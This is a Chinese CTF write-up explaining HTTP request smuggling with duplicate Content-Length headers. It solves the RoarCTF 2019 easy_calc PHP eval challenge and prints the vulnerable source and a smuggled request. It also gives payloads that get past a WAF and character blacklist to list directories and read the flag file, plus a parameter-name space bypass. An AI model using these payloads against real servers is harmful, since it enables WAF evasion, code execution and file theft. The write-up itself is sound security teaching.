HTTP走私漏洞
Cl-Cl
以一个http包为例,这个数据包中存在两个Cl,按照正常规则如果存在两个Cl并且两个Cl的值不等时候,服务器会返回400错误,但是总有服务器不会严格执行规范,中间服务器在接受到这个请求后会按照第一个Content-Length对请求进行处理,但是这个请求包发到后端服务器就会按照第二个Content-length进行处理,这要就导致了一个问题,第二个Content-Length长度比第一个Content-length少一位,这要在第二次处理这个数据包的时候a就会没有被读取到从而留在了缓冲区,但是我们知道HTTP和普通的TCP不一样,存在一个 Keep-Alive 会导致TCP重用,那么下一个请求包就会把a拼接进去导致错误。(参考资料:https://paper.seebug.org/1048/)
构造的恶意请求包:
POST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
12345\r\n
a第二次被拼接的请求包:
aPOST / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 8\r\n
Content-Length: 7\r\n
12345\r\n
a 那么如果服务器严格遵循规范呢?存在两个Cl就直接400岂不是没法用了?这里又引申了一个问题,这样如果第一个前端服务器是nginx用于转发docker的流量而这个前端服务器存在一个waf,那么就可能导致这个waf失效,完整转发我们恶意代码,RoarCTF的easy-calc就是这样的问题。
RoarCTF2019-easycalc
题目源码:
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?> 题目源码比较简单,绕过方式和国赛lovemath一样或者使用取反方式绕过
但是这里存在一个问题这个环境存在waf只能够使用这些字符:
%&.,(*/-+)<=>?;:@\~}|{0123456789这里就是上面说的方法,使用两个CL导致前端服务器400,但是完整转发了HTTP请求,从而导致执行waf被绕过导致执行恶意代码。
这里构造payload与lovemath一致,使用
base_convert("scandir",36,10);也就是说将36进制转换为10进制,具体请参考国赛lovemath.然后将10进制转换为36进制那么就可以构造出来scandir,别人的write up的payload是base_convert(61693386291,10,36)(hex2bin(dechex(47)));,dechex()将10进制转16进制,而hex2bin是将16进制转char,但是我不知为什么他们要这么搞,这里并没有过滤scandir,甚至构造‘/’根本用不上十进制转16进制再转char,而是直接可以用AIISC转char。而且很多队伍解法一样,目测py的很多。最终payload:
base_convert(2146934604002,10,36(hex2bin(dechex(47)).base_convert(25254448,10,36))我的payload:
var_dump(scandir(chr(47)));最终payload:
var_dump(readfile(chr(47).base_convert(25254448,10,36)));
非预期解
PHP中会对传入的参数名去取空格或者替换为下划线字符。(https://www.freebuf.com/articles/web/213359.html)如本次比赛的num前面加个空格即可绕过waf.
